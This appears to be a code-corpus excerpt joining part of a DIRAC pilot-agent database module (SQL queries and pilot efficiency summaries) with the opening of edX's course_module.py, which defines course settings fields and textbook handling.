req = "UPDATE PilotAgents SET CurrentJobID=%d WHERE PilotJobReference='%s'" % (jobID, pilotRef)
return self._update(req)
##########################################################################################
def getJobsForPilot(self, pilotID):
""" Get IDs of Jobs that were executed by a pilot
"""
cmd = "SELECT pilotID,JobID FROM JobToPilotMapping "
if isinstance(pilotID, list):
cmd = cmd + " WHERE pilotID IN (%s)" % ",".join(['%s' % x for x in pilotID])
else:
cmd = cmd + " WHERE pilotID = %s" % pilotID
result = self._query(cmd)
if not result['OK']:
return result
resDict = {}
for row in result['Value']:
if not row[0] in resDict:
resDict[row[0]] = []
resDict[row[0]].append(row[1])
return S_OK(resDict)
##########################################################################################
def getPilotsForTaskQueue(self, taskQueueID, gridType=None, limit=None):
""" Get IDs of Pilot Agents that were submitted for the given taskQueue,
specify optionally the grid type, results are sorted by Submission time
an Optional limit can be set.
"""
if gridType:
req = "SELECT PilotID FROM PilotAgents WHERE TaskQueueID=%s AND GridType='%s' " % (taskQueueID, gridType)
else:
req = "SELECT PilotID FROM PilotAgents WHERE TaskQueueID=%s " % taskQueueID
req += 'ORDER BY SubmissionTime DESC '
if limit:
req += 'LIMIT %s' % limit
result = self._query(req)
if not result['OK']:
return result
else:
if result['Value']:
pilotList = [x[0] for x in result['Value']]
return S_OK(pilotList)
return S_ERROR('PilotJobReferences for TaskQueueID %s not found' % taskQueueID)
##########################################################################################
def getPilotsForJobID(self, jobID):
""" Get ID of Pilot Agent that is running a given JobID
"""
result = self._query('SELECT PilotID FROM JobToPilotMapping WHERE JobID=%s' % jobID)
if not result['OK']:
self.log.error("getPilotsForJobID failed", result['Message'])
return result
if result['Value']:
pilotList = [x[0] for x in result['Value']]
return S_OK(pilotList)
self.log.warn('PilotID for job %d not found: not matched yet?' % jobID)
return S_OK([])
##########################################################################################
def getPilotCurrentJob(self, pilotRef):
""" The job ID currently executed by the pilot
"""
req = "SELECT CurrentJobID FROM PilotAgents WHERE PilotJobReference='%s' " % pilotRef
result = self._query(req)
if not result['OK']:
return result
if result['Value']:
jobID = int(result['Value'][0][0])
return S_OK(jobID)
self.log.warn('Current job ID for pilot %s is not known: pilot did not match jobs yet?' % pilotRef)
return S_OK()
##########################################################################################
# FIXME: investigate it getPilotSummaryShort can replace this method
def getPilotSummary(self, startdate='', enddate=''):
""" Get summary of the pilot jobs status by site
"""
st_list = ['Aborted', 'Running', 'Done', 'Submitted', 'Ready', 'Scheduled', 'Waiting']
summary_dict = {}
summary_dict['Total'] = {}
for st in st_list:
summary_dict['Total'][st] = 0
req = "SELECT DestinationSite,count(DestinationSite) FROM PilotAgents " + \
"WHERE Status='%s' " % st
if startdate:
req = req + " AND SubmissionTime >= '%s'" % startdate
if enddate:
req = req + " AND SubmissionTime <= '%s'" % enddate
req = req + " GROUP BY DestinationSite"
result = self._query(req)
if not result['OK']:
return result
else:
if result['Value']:
for res in result['Value']:
site = res[0]
count = res[1]
if site:
if site not in summary_dict:
summary_dict[site] = {}
summary_dict[site][st] = int(count)
summary_dict['Total'][st] += int(count)
# Get aborted pilots in the last hour, day
req = "SELECT DestinationSite,count(DestinationSite) FROM PilotAgents WHERE Status='Aborted' AND "
reqDict = {}
reqDict['Aborted_Hour'] = req + " LastUpdateTime >= DATE_SUB(UTC_TIMESTAMP(), INTERVAL 1 HOUR)"
reqDict['Aborted_Day'] = req + " LastUpdateTime >= DATE_SUB(UTC_TIMESTAMP(), INTERVAL 1 DAY)"
for key, req in reqDict.items():
result = self._query(req)
if not result['OK']:
break
if result['Value']:
for res in result['Value']:
site = res[0]
count = res[1]
if site:
if site in summary_dict:
summary_dict[site][key] = int(count)
return S_OK(summary_dict)
# def getPilotSummaryShort( self, startTimeWindow = None, endTimeWindow = None, ce = '' ):
# """
# Spin off the method getPilotSummary. It is doing things in such a way that
# do not make much sense. This method returns the pilots that were updated in the
# time window [ startTimeWindow, endTimeWindow ), if they are present.
# """
#
# sqlSelect = 'SELECT DestinationSite,Status,count(Status) FROM PilotAgents'
#
# whereSelect = []
#
# if startTimeWindow is not None:
# whereSelect.append( ' LastUpdateTime >= "%s"' % startTimeWindow )
# if endTimeWindow is not None:
# whereSelect.append( ' LastUpdateTime < "%s"' % endTimeWindow )
# if ce:
# whereSelect.append( ' DestinationSite = "%s"' % ce )
#
# if whereSelect:
# sqlSelect += ' WHERE'
# sqlSelect += ' AND'.join( whereSelect )
#
# sqlSelect += ' GROUP BY DestinationSite,Status'
#
# resSelect = self._query( sqlSelect )
# if not resSelect[ 'OK' ]:
# return resSelect
#
# result = { 'Total' : collections.defaultdict( int ) }
#
# for row in resSelect[ 'Value' ]:
#
# ceName, statusName, statusCount = row
#
# if not ceName in result:
# result[ ceName ] = {}
# result[ ceName ][ statusName ] = int( statusCount )
#
# result[ 'Total' ][ statusName ] += int( statusCount )
#
# return S_OK( result )
##########################################################################################
def getGroupedPilotSummary(self, selectDict, columnList):
"""
    A simplified pilot summary based on the getPilotSummaryWeb method. It calculates pilot
    efficiency with the same algorithm as the Web version, basically taking into account only
    Done and Aborted pilots from the last day. The selection is done entirely in SQL.
:param dict selectDict: A dictionary to pass additional conditions to select statements, i.e.
it allows to define start time for Done and Aborted Pilots.
:param list columnList: A list of column to consider when grouping to calculate efficiencies.
e.g. ['GridSite', 'DestinationSite'] is used to calculate efficiencies
for sites and CEs. If we want to add an OwnerGroup it would be:
['GridSite', 'DestinationSite', 'OwnerGroup'].
:return: S_OK/S_ERROR with a dict containing the ParameterNames and Records lists.
"""
table = PivotedPilotSummaryTable(columnList)
sqlQuery = table.buildSQL()
self.logger.debug("SQL query : ")
self.logger.debug("\n" + sqlQuery)
res = self._query(sqlQuery)
if not res['OK']:
return res
self.logger.info(res)
# TODO add site or CE status, while looping
rows = []
columns = table.getColumnList()
try:
groupIndex = columns.index('OwnerGroup')
# should probably change a column name to VO here as well to avoid confusion
except ValueError:
groupIndex = None
result = {'ParameterNames': columns}
multiple = False
# If not grouped by CE:
if 'CE' not in columns:
multiple = True
for row in res['Value']:
lrow = list(row)
      if groupIndex is not None:
lrow[groupIndex] = getVOForGroup(row[groupIndex])
if multiple:
lrow.append('Multiple')
for index, value in enumerate(row):
if isinstance(value, decimal.Decimal):
lrow[index] = float(value)
# get the value of the Total column
if 'Total' in columnList:
total = lrow[columnList.index('Total')]
else:
total = 0
if 'PilotJobEff' in columnList:
eff = lrow[columnList.index('PilotJobEff')]
else:
eff = 0.
lrow.append(self._getElementStatus(total, eff))
rows.append(list(lrow))
# If not grouped by CE and more then 1 CE in the result:
if multiple:
columns.append('CE') # 'DestinationSite' re-mapped to 'CE' already
columns.append('Status')
result['Records'] = rows
return S_OK(result)
def _getElementStatus(self, total, eff):
"""
Assign status to a site or resource based on pilot efficiency.
    :param total: total number of pilots; a quality status is only assigned when total > 10, otherwise 'Idle'
    :param eff: pilot efficiency in percent
:return: status string
"""
# Evaluate the quality status of the Site/CE
if total > 10:
if eff < 25.:
return 'Bad'
elif eff < 60.:
return 'Poor'
elif eff < 85.:
return 'Fair'
else:
return 'Good'
else:
return 'Idle'
def getPilotSummaryWeb(self, selectDict, sortList, startItem, maxItems):
""" Get summary of the pilot jobs status by CE/site in a standard structure
"""
stateNames = ['Submitted', 'Ready', 'Scheduled', 'Waiting', 'Running', 'Done', 'Aborted', 'Failed']
allStateNames = stateNames + ['Done_Empty', 'Aborted_Hour']
paramNames = ['Site', 'CE'] + allStateNames
last_update = None
if 'LastUpdateTime' in selectDict:
last_update = selectDict['LastUpdateTime']
del selectDict['LastUpdateTime']
site_select = []
if 'GridSite' in selectDict:
site_select = selectDict['GridSite']
if not isinstance(site_select, list):
site_select = [site_select]
del selectDict['GridSite']
status_select = []
if 'Status' in selectDict:
status_select = selectDict['Status']
if not isinstance(status_select, list):
status_select = [status_select]
del selectDict['Status']
expand_site = ''
if 'ExpandSite' in selectDict:
expand_site = selectDict['ExpandSite']
site_select = [expand_site]
del selectDict['ExpandSite']
# Get all the data from the database with various selections
result = self.getCounters('PilotAgents',
['GridSite', 'DestinationSite', 'Status'],
selectDict, newer=last_update, timeStamp='LastUpdateTime')
if not result['OK']:
return result
last_update = Time.dateTime() - Time.hour
selectDict['Status'] = 'Aborted'
resultHour = self.getCounters('PilotAgents',
['GridSite', 'DestinationSite', 'Status'],
selectDict, newer=last_update, timeStamp='LastUpdateTime')
if not resultHour['OK']:
return resultHour
last_update = Time.dateTime() - Time.day
selectDict['Status'] = ['Aborted', 'Done']
resultDay = self.getCounters('PilotAgents',
['GridSite', 'DestinationSite', 'Status'],
selectDict, newer=last_update, timeStamp='LastUpdateTime')
if not resultDay['OK']:
return resultDay
selectDict['CurrentJobID'] = 0
selectDict['Status'] = 'Done'
resultDayEmpty = self.getCounters('PilotAgents',
['GridSite', 'DestinationSite', 'Status'],
selectDict, newer=last_update, timeStamp='LastUpdateTime')
if not resultDayEmpty['OK']:
return resultDayEmpty
ceMap = {}
resMap = getCESiteMapping()
if resMap['OK']:
ceMap = resMap['Value']
# Sort out different counters
resultDict = {}
resultDict['Unknown'] = {}
for attDict, count in result['Value']:
site = attDict['GridSite']
ce = attDict['DestinationSite']
state = attDict['Status']
if site == 'Unknown' and ce != "Unknown" and ce != "Multiple" and ce in ceMap:
site = ceMap[ce]
if site not in resultDict:
resultDict[site] = {}
if ce not in resultDict[site]:
resultDict[site][ce] = {}
for p in allStateNames:
resultDict[site][ce][p] = 0
resultDict[site][ce][state] = count
for attDict, count in resultDay['Value']:
site = attDict['GridSite']
ce = attDict['DestinationSite']
state = attDict['Status']
if site == 'Unknown' and ce != "Unknown" and ce in ceMap:
site = ceMap[ce]
if state == "Done":
resultDict[site][ce]["Done"] = count
if state == "Aborted":
resultDict[site][ce]["Aborted"] = count
for attDict, count in resultDayEmpty['Value']:
site = attDict['GridSite']
ce = attDict['DestinationSite']
state = attDict['Status']
if site == 'Unknown' and ce != "Unknown" and ce in ceMap:
site = ceMap[ce]
if state == "Done":
resultDict[site][ce]["Done_Empty"] = count
for attDict, count in resultHour['Value']:
site = attDict['GridSite']
ce = attDict['DestinationSite']
state = attDict['Status']
if site == 'Unknown' and ce != "Unknown" and ce in ceMap:
site = ceMap[ce]
if state == "Aborted":
resultDict[site][ce]["Aborted_Hour"] = count
records = []
siteSumDict = {}
for site in resultDict:
sumDict = {}
for state in allStateNames:
if state not in sumDict:
sumDict[state] = 0
sumDict['Total'] = 0
for ce in resultDict[site]:
itemList = [site, ce]
total = 0
for state in allStateNames:
itemList.append(resultDict[site][ce][state])
sumDict[state] += resultDict[site][ce][state]
if state == "Done":
done = resultDict[site][ce][state]
if state == "Done_Empty":
empty = resultDict[site][ce][state]
if state == "Aborted":
aborted = resultDict[site][ce][state]
if state != "Aborted_Hour" and state != "Done_Empty":
total += resultDict[site][ce][state]
sumDict['Total'] += total
# Add the total number of pilots seen in the last day
itemList.append(total)
# Add pilot submission efficiency evaluation
if (done - empty) > 0:
eff = done / (done - empty)
elif done == 0:
eff = 0.
elif empty == done:
eff = 99.
else:
eff = 0.
itemList.append('%.2f' % eff)
# Add pilot job efficiency evaluation
if total > 0:
eff = (total - aborted) / total * 100
else:
eff = 100.
itemList.append('%.2f' % eff)
# Evaluate the quality status of the CE
if total > 10:
if eff < 25.:
itemList.append('Bad')
elif eff < 60.:
itemList.append('Poor')
elif eff < 85.:
itemList.append('Fair')
else:
itemList.append('Good')
else:
itemList.append('Idle')
if len(resultDict[site]) == 1 or expand_site:
records.append(itemList)
if len(resultDict[site]) > 1 and not expand_site:
itemList = [site, 'Multiple']
for state in allStateNames + ['Total']:
if state in sumDict:
itemList.append(sumDict[state])
else:
itemList.append(0)
done = sumDict["Done"]
empty = sumDict["Done_Empty"]
aborted = sumDict["Aborted"]
total = sumDict["Total"]
# Add pilot submission efficiency evaluation
if (done - empty) > 0:
eff = done / (done - empty)
elif done == 0:
eff = 0.
elif empty == done:
eff = 99.
else:
eff = 0.
itemList.append('%.2f' % eff)
# Add pilot job efficiency evaluation
if total > 0:
eff = (total - aborted) / total * 100
else:
eff = 100.
itemList.append('%.2f' % eff)
# Evaluate the quality status of the Site
if total > 10:
if eff < 25.:
itemList.append('Bad')
elif eff < 60.:
itemList.append('Poor')
elif eff < 85.:
itemList.append('Fair')
else:
itemList.append('Good')
else:
itemList.append('Idle')
records.append(itemList)
for state in allStateNames + ['Total']:
if state not in siteSumDict:
siteSumDict[state] = sumDict[state]
else:
siteSumDict[state] += sumDict[state]
# Perform site selection
if site_select:
new_records = []
for r in records:
if r[0] in site_select:
new_records.append(r)
records = new_records
# Perform status selection
if status_select:
new_records = []
for r in records:
if r[14] in status_select:
new_records.append(r)
records = new_records
# Get the Site Mask data
result = SiteStatus().getUsableSites()
if result['OK']:
siteMask = result['Value']
for r in records:
if r[0] in siteMask:
r.append('Yes')
else:
r.append('No')
else:
for r in records:
r.append('Unknown')
finalDict = {}
finalDict['TotalRecords'] = len(records)
finalDict['ParameterNames'] = paramNames + \
['Total', 'PilotsPerJob', 'PilotJobEff', 'Status', 'InMask']
# Return all the records if maxItems == 0 or the specified number otherwise
if maxItems:
finalDict['Records'] = records[startItem:startItem + maxItems]
else:
finalDict['Records'] = records
done = siteSumDict["Done"]
empty = siteSumDict["Done_Empty"]
aborted = siteSumDict["Aborted"]
total = siteSumDict["Total"]
# Add pilot submission efficiency evaluation
if (done - empty) > 0:
eff = done / (done - empty)
elif done == 0:
eff = 0.
elif empty == done:
eff = 99.
else:
eff = 0.
siteSumDict['PilotsPerJob'] = '%.2f' % eff
# Add pilot job efficiency evaluation
if total > 0:
eff = (total - aborted) / total * 100
else:
eff = 100.
siteSumDict['PilotJobEff'] = '%.2f' % eff
# Evaluate the overall quality status
if total > 100:
if eff < 25.:
siteSumDict['Status'] = 'Bad'
elif eff < 60.:
siteSumDict['Status'] = 'Poor'
elif eff < 85.:
siteSumDict['Status'] = 'Fair'
else:
siteSumDict['Status'] = 'Good'
else:
siteSumDict['Status'] = 'Idle'
finalDict['Extras'] = siteSumDict
return S_OK(finalDict)
##########################################################################################
def getPilotMonitorSelectors(self):
""" Get distinct values for the Pilot Monitor page selectors
"""
paramNames = ['OwnerDN', 'OwnerGroup', 'GridType', 'Broker',
'Status', 'DestinationSite', 'GridSite']
resultDict = {}
for param in paramNames:
result = self.getDistinctAttributeValues('PilotAgents', param)
if result['OK']:
resultDict[param] = result['Value']
else:
resultDict = []
if param == "OwnerDN":
userList = []
for dn in result['Value']:
resultUser = getUsernameForDN(dn)
if resultUser['OK']:
userList.append(resultUser['Value'])
resultDict["Owner"] = userList
return S_OK(resultDict)
##########################################################################################
def getPilotMonitorWeb(self, selectDict, sortList, startItem, maxItems):
""" Get summary of the pilot job information in a standard structure
"""
resultDict = {}
if 'LastUpdateTime' in selectDict:
del selectDict['LastUpdateTime']
if 'Owner' in selectDict:
userList = selectDict['Owner']
if not isinstance(userList, list):
userList = [userList]
dnList = []
for uName in userList:
uList = getDNForUsername(uName)['Value']
dnList += uList
selectDict['OwnerDN'] = dnList
del selectDict['Owner']
startDate = selectDict.get('FromDate', None)
if startDate:
del selectDict['FromDate']
# For backward compatibility
if startDate is None:
startDate = selectDict.get('LastUpdateTime', None)
if startDate:
del selectDict['LastUpdateTime']
endDate = selectDict.get('ToDate', None)
if endDate:
del selectDict['ToDate']
# Sorting instructions. Only one for the moment.
if sortList:
orderAttribute = sortList[0][0] + ":" + sortList[0][1]
else:
orderAttribute = None
# Select pilots for the summary
result = self.selectPilots(
selectDict,
orderAttribute=orderAttribute,
newer=startDate,
older=endDate,
timeStamp='LastUpdateTime')
if not result['OK']:
return S_ERROR('Failed to select pilots: ' + result['Message'])
pList = result['Value']
nPilots = len(pList)
resultDict['TotalRecords'] = nPilots
if nPilots == 0:
return S_OK(resultDict)
ini = startItem
last = ini + maxItems
if ini >= nPilots:
return S_ERROR('Item number out of range')
if last > nPilots:
last = nPilots
pilotList = pList[ini:last]
paramNames = ['PilotJobReference', 'OwnerDN', 'OwnerGroup', 'GridType', 'Broker',
'Status', 'DestinationSite', 'BenchMark', 'ParentID',
'SubmissionTime', 'PilotID', 'LastUpdateTime', 'CurrentJobID', 'TaskQueueID',
'GridSite']
result = self.getPilotInfo(pilotList, paramNames=paramNames)
if not result['OK']:
return S_ERROR('Failed to get pilot info: ' + result['Message'])
pilotDict = result['Value']
records = []
for pilot in pilotList:
parList = []
for parameter in paramNames:
if not isinstance(pilotDict[pilot][parameter], six.integer_types):
parList.append(str(pilotDict[pilot][parameter]))
else:
parList.append(pilotDict[pilot][parameter])
if parameter == 'GridSite':
gridSite = pilotDict[pilot][parameter]
# If the Grid Site is unknown try to recover it in the last moment
if gridSite == "Unknown":
ce = pilotDict[pilot]['DestinationSite']
result = getCESiteMapping(ce)
if result['OK']:
gridSite = result['Value'].get(ce)
del parList[-1]
parList.append(gridSite)
records.append(parList)
resultDict['ParameterNames'] = paramNames
resultDict['Records'] = records
return S_OK(resultDict)
class PivotedPilotSummaryTable:
"""
The class creates a 'pivoted' table by combining records with the same group
of self.columnList into a single row. It allows an easy calculation of pilot efficiencies.
"""
pstates = ['Submitted', 'Done', 'Failed', 'Aborted',
'Running', 'Waiting', 'Scheduled', 'Ready']
def __init__(self, columnList):
"""
Initialise a table with columns to be grouped by.
:param columnList: i.e. ['GridSite', 'DestinationSite']
:return:
"""
self.columnList = columnList
# we want 'Site' and 'CE' in the final result
colMap = {'GridSite': 'Site', 'DestinationSite': 'CE'}
self._columns = [colMap.get(val, val) for val in columnList]
self._columns += self.pstates # MySQL._query() does not give us column names, sadly.
def buildSQL(self, selectDict=None):
"""
Build an SQL query to create a table with all status counts in one row, ("pivoted")
grouped by columns in the column list.
:param dict selectDict:
:return: SQL query
"""
lastUpdate = Time.dateTime() - Time.day
pvtable = 'pivoted'
innerGroupBy = "(SELECT %s, Status,\n " \
"count(CASE WHEN CurrentJobID=0 THEN 1 END) AS Empties," \
" count(*) AS qty FROM PilotAgents\n " \
"WHERE Status NOT IN ('Done', 'Aborted') OR (Status in ('Done', 'Aborted') \n" \
" AND \n" \
" LastUpdateTime > '%s')" \
" GROUP by %s, Status)\n AS %s" % (
_quotedList(self.columnList), lastUpdate,
_quotedList(self.columnList), pvtable)
# pivoted table: combine records with the same group of self.columnList into a single row.
pivotedQuery = "SELECT %s,\n" % ', '.join([pvtable + '.' + item for item in self.columnList])
lineTemplate = " SUM(if (pivoted.Status={state!r}, pivoted.qty, 0)) AS {state}"
pivotedQuery += ',\n'.join(lineTemplate.format(state=state) for state in self.pstates)
pivotedQuery += ",\n SUM(if (%s.Status='Done', %s.Empties,0)) AS Done_Empty,\n" \
" SUM(%s.qty) AS Total " \
"FROM\n" % (pvtable, pvtable, pvtable)
outerGroupBy = " GROUP BY %s) \nAS pivotedEff;" % _quotedList(self.columnList)
# add efficiency columns using aliases defined in the pivoted table
effCase = "(CASE\n WHEN pivotedEff.Done - pivotedEff.Done_Empty > 0 \n" \
" THEN pivotedEff.Done/(pivotedEff.Done-pivotedEff.Done_Empty) \n" \
" WHEN pivotedEff.Done=0 THEN 0 \n" \
" WHEN pivotedEff.Done=pivotedEff.Done_Empty \n" \
" THEN 99.0 ELSE 0.0 END) AS PilotsPerJob,\n" \
" (pivotedEff.Total - pivotedEff.Aborted)/pivotedEff.Total*100.0 AS PilotJobEff \nFROM \n("
effSelectTemplate = " CAST(pivotedEff.{state} AS UNSIGNED) AS {state} "
# now select the columns + states:
pivotedEff = "SELECT %s,\n" % ', '.join(['pivotedEff' + '.' + item for item in self.columnList]) + \
', '.join(effSelectTemplate.format(state=state) for state in self.pstates + ['Total']) + ", \n"
finalQuery = pivotedEff + effCase + pivotedQuery + innerGroupBy + outerGroupBy
self._columns += ['Total', 'PilotsPerJob', 'PilotJobEff']
return finalQuery
def getColumnList(self):
return self._columns
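# A minimal usage sketch (illustrative only; assumes a database handle `db`
# exposing the usual DIRAC `_query()` interface):
#
#   table = PivotedPilotSummaryTable(['GridSite', 'DestinationSite'])
#   sql = table.buildSQL()
#   result = db._query(sql)
#   if result['OK']:
#       rows = result['Value']            # one row per (Site, CE) pair
#       columns = table.getColumnList()   # matches the row layout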
| gpl-3.0 | 8,148,434,752,963,911,000 | 34.197874 | 119 | 0.572793 | false |
Endika/edx-platform | common/lib/xmodule/xmodule/course_module.py | 1 | 56725 | """
Django module container for classes and operations related to the "Course Module" content type
"""
import json
import logging
from cStringIO import StringIO
from datetime import datetime
import requests
from django.utils.timezone import UTC
from lazy import lazy
from lxml import etree
from path import Path as path
from xblock.core import XBlock
from xblock.fields import Scope, List, String, Dict, Boolean, Integer, Float
from xmodule import course_metadata_utils
from xmodule.course_metadata_utils import DEFAULT_START_DATE
from xmodule.exceptions import UndefinedContext
from xmodule.graders import grader_from_conf
from xmodule.mixin import LicenseMixin
from xmodule.seq_module import SequenceDescriptor, SequenceModule
from xmodule.tabs import CourseTabList, InvalidTabsException
from .fields import Date
log = logging.getLogger(__name__)
# Make '_' a no-op so we can scrape strings. Using lambda instead of
# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file
_ = lambda text: text
CATALOG_VISIBILITY_CATALOG_AND_ABOUT = "both"
CATALOG_VISIBILITY_ABOUT = "about"
CATALOG_VISIBILITY_NONE = "none"
class StringOrDate(Date):
def from_json(self, value):
"""
Parse an optional metadata key containing a time or a string:
if present, assume it's a string if it doesn't parse.
"""
try:
result = super(StringOrDate, self).from_json(value)
except ValueError:
return value
if result is None:
return value
else:
return result
def to_json(self, value):
"""
Convert a time struct or string to a string.
"""
try:
result = super(StringOrDate, self).to_json(value)
        except Exception:
return value
if result is None:
return value
else:
return result
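# Behavior sketch for StringOrDate (hypothetical values): date-like strings are
# parsed as usual, anything unparseable is passed through untouched.
#
#   field = StringOrDate()
#   field.from_json("2013-07-17T12:00")  # -> parsed datetime
#   field.from_json("TBD")               # -> "TBD" (kept as a plain string)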
edx_xml_parser = etree.XMLParser(dtd_validation=False, load_dtd=False,
remove_comments=True, remove_blank_text=True)
_cached_toc = {}
class Textbook(object):
def __init__(self, title, book_url):
self.title = title
self.book_url = book_url
@lazy
def start_page(self):
return int(self.table_of_contents[0].attrib['page'])
@lazy
def end_page(self):
# The last page should be the last element in the table of contents,
# but it may be nested. So recurse all the way down the last element
last_el = self.table_of_contents[-1]
while last_el.getchildren():
last_el = last_el[-1]
return int(last_el.attrib['page'])
@lazy
def table_of_contents(self):
"""
Accesses the textbook's table of contents (default name "toc.xml") at the URL self.book_url
Returns XML tree representation of the table of contents
"""
toc_url = self.book_url + 'toc.xml'
# cdodge: I've added this caching of TOC because in Mongo-backed instances (but not Filesystem stores)
# course modules have a very short lifespan and are constantly being created and torn down.
# Since this module in the __init__() method does a synchronous call to AWS to get the TOC
# this is causing a big performance problem. So let's be a bit smarter about this and cache
# each fetch and store in-mem for 10 minutes.
# NOTE: I have to get this onto sandbox ASAP as we're having runtime failures. I'd like to swing back and
# rewrite to use the traditional Django in-memory cache.
try:
# see if we already fetched this
if toc_url in _cached_toc:
(table_of_contents, timestamp) = _cached_toc[toc_url]
                age = datetime.now(UTC()) - timestamp
# expire every 10 minutes
if age.seconds < 600:
return table_of_contents
        except Exception:
            pass
# Get the table of contents from S3
log.info("Retrieving textbook table of contents from %s", toc_url)
try:
r = requests.get(toc_url)
except Exception as err:
msg = 'Error %s: Unable to retrieve textbook table of contents at %s' % (err, toc_url)
log.error(msg)
raise Exception(msg)
# TOC is XML. Parse it
try:
table_of_contents = etree.fromstring(r.text)
except Exception as err:
msg = 'Error %s: Unable to parse XML for textbook table of contents at %s' % (err, toc_url)
log.error(msg)
raise Exception(msg)
return table_of_contents
def __eq__(self, other):
return (self.title == other.title and
self.book_url == other.book_url)
def __ne__(self, other):
return not self == other
class TextbookList(List):
def from_json(self, values):
textbooks = []
for title, book_url in values:
try:
textbooks.append(Textbook(title, book_url))
            except Exception:
# If we can't get to S3 (e.g. on a train with no internet), don't break
# the rest of the courseware.
log.exception("Couldn't load textbook ({0}, {1})".format(title, book_url))
continue
return textbooks
def to_json(self, values):
json_data = []
for val in values:
if isinstance(val, Textbook):
json_data.append((val.title, val.book_url))
elif isinstance(val, tuple):
json_data.append(val)
else:
continue
return json_data
class CourseFields(object):
lti_passports = List(
display_name=_("LTI Passports"),
help=_('Enter the passports for course LTI tools in the following format: "id:client_key:client_secret".'),
scope=Scope.settings
)
textbooks = TextbookList(
help=_("List of pairs of (title, url) for textbooks used in this course"),
default=[],
scope=Scope.content
)
wiki_slug = String(help=_("Slug that points to the wiki for this course"), scope=Scope.content)
enrollment_start = Date(help=_("Date that enrollment for this class is opened"), scope=Scope.settings)
enrollment_end = Date(help=_("Date that enrollment for this class is closed"), scope=Scope.settings)
start = Date(
help=_("Start time when this module is visible"),
default=DEFAULT_START_DATE,
scope=Scope.settings
)
end = Date(help=_("Date that this class ends"), scope=Scope.settings)
cosmetic_display_price = Integer(
display_name=_("Cosmetic Course Display Price"),
help=_(
"The cost displayed to students for enrolling in the course. If a paid course registration price is "
"set by an administrator in the database, that price will be displayed instead of this one."
),
default=0,
scope=Scope.settings,
)
advertised_start = String(
display_name=_("Course Advertised Start Date"),
help=_(
"Enter the date you want to advertise as the course start date, if this date is different from the set "
"start date. To advertise the set start date, enter null."
),
scope=Scope.settings
)
pre_requisite_courses = List(
display_name=_("Pre-Requisite Courses"),
help=_("Pre-Requisite Course key if this course has a pre-requisite course"),
scope=Scope.settings
)
grading_policy = Dict(
help=_("Grading policy definition for this class"),
default={
"GRADER": [
{
"type": "Homework",
"min_count": 12,
"drop_count": 2,
"short_label": "HW",
"weight": 0.15,
},
{
"type": "Lab",
"min_count": 12,
"drop_count": 2,
"weight": 0.15,
},
{
"type": "Midterm Exam",
"short_label": "Midterm",
"min_count": 1,
"drop_count": 0,
"weight": 0.3,
},
{
"type": "Final Exam",
"short_label": "Final",
"min_count": 1,
"drop_count": 0,
"weight": 0.4,
}
],
"GRADE_CUTOFFS": {
"Pass": 0.5,
},
},
scope=Scope.content
)
show_calculator = Boolean(
display_name=_("Show Calculator"),
help=_("Enter true or false. When true, students can see the calculator in the course."),
default=False,
scope=Scope.settings
)
display_name = String(
help=_("Enter the name of the course as it should appear in the edX.org course list."),
default="Empty",
display_name=_("Course Display Name"),
scope=Scope.settings
)
course_edit_method = String(
display_name=_("Course Editor"),
help=_('Enter the method by which this course is edited ("XML" or "Studio").'),
default="Studio",
scope=Scope.settings,
        deprecated=True  # Deprecated because this value is not expected to be edited within Studio.
)
tabs = CourseTabList(help="List of tabs to enable in this course", scope=Scope.settings, default=[])
end_of_course_survey_url = String(
display_name=_("Course Survey URL"),
help=_("Enter the URL for the end-of-course survey. If your course does not have a survey, enter null."),
scope=Scope.settings,
deprecated=True # We wish to remove this entirely, TNL-3399
)
discussion_blackouts = List(
display_name=_("Discussion Blackout Dates"),
help=_(
'Enter pairs of dates between which students cannot post to discussion forums. Inside the provided '
'brackets, enter an additional set of square brackets surrounding each pair of dates you add. '
'Format each pair of dates as ["YYYY-MM-DD", "YYYY-MM-DD"]. To specify times as well as dates, '
'format each pair as ["YYYY-MM-DDTHH:MM", "YYYY-MM-DDTHH:MM"]. Be sure to include the "T" between '
'the date and time. For example, an entry defining two blackout periods looks like this, including '
'the outer pair of square brackets: [["2015-09-15", "2015-09-21"], ["2015-10-01", "2015-10-08"]] '
),
scope=Scope.settings
)
discussion_topics = Dict(
display_name=_("Discussion Topic Mapping"),
help=_(
'Enter discussion categories in the following format: "CategoryName": '
'{"id": "i4x-InstitutionName-CourseNumber-course-CourseRun"}. For example, one discussion '
'category may be "Lydian Mode": {"id": "i4x-UniversityX-MUS101-course-2015_T1"}. The "id" '
'value for each category must be unique. In "id" values, the only special characters that are '
'supported are underscore, hyphen, and period.'
),
scope=Scope.settings
)
discussion_sort_alpha = Boolean(
display_name=_("Discussion Sorting Alphabetical"),
scope=Scope.settings, default=False,
help=_(
"Enter true or false. If true, discussion categories and subcategories are sorted alphabetically. "
"If false, they are sorted chronologically."
)
)
announcement = Date(
display_name=_("Course Announcement Date"),
help=_("Enter the date to announce your course."),
scope=Scope.settings
)
cohort_config = Dict(
display_name=_("Cohort Configuration"),
help=_(
"Enter policy keys and values to enable the cohort feature, define automated student assignment to "
"groups, or identify any course-wide discussion topics as private to cohort members."
),
scope=Scope.settings
)
is_new = Boolean(
display_name=_("Course Is New"),
help=_(
"Enter true or false. If true, the course appears in the list of new courses on edx.org, and a New! "
"badge temporarily appears next to the course image."
),
scope=Scope.settings
)
mobile_available = Boolean(
display_name=_("Mobile Course Available"),
help=_("Enter true or false. If true, the course will be available to mobile devices."),
default=False,
scope=Scope.settings
)
video_upload_pipeline = Dict(
display_name=_("Video Upload Credentials"),
help=_("Enter the unique identifier for your course's video files provided by edX."),
scope=Scope.settings
)
no_grade = Boolean(
display_name=_("Course Not Graded"),
help=_("Enter true or false. If true, the course will not be graded."),
default=False,
scope=Scope.settings
)
disable_progress_graph = Boolean(
display_name=_("Disable Progress Graph"),
help=_("Enter true or false. If true, students cannot view the progress graph."),
default=False,
scope=Scope.settings
)
pdf_textbooks = List(
display_name=_("PDF Textbooks"),
help=_("List of dictionaries containing pdf_textbook configuration"), scope=Scope.settings
)
html_textbooks = List(
display_name=_("HTML Textbooks"),
help=_(
"For HTML textbooks that appear as separate tabs in the courseware, enter the name of the tab (usually "
"the name of the book) as well as the URLs and titles of all the chapters in the book."
),
scope=Scope.settings
)
remote_gradebook = Dict(
display_name=_("Remote Gradebook"),
help=_(
"Enter the remote gradebook mapping. Only use this setting when "
"REMOTE_GRADEBOOK_URL has been specified."
),
scope=Scope.settings
)
enable_ccx = Boolean(
# Translators: Custom Courses for edX (CCX) is an edX feature for re-using course content. CCX Coach is
# a role created by a course Instructor to enable a person (the "Coach") to manage the custom course for
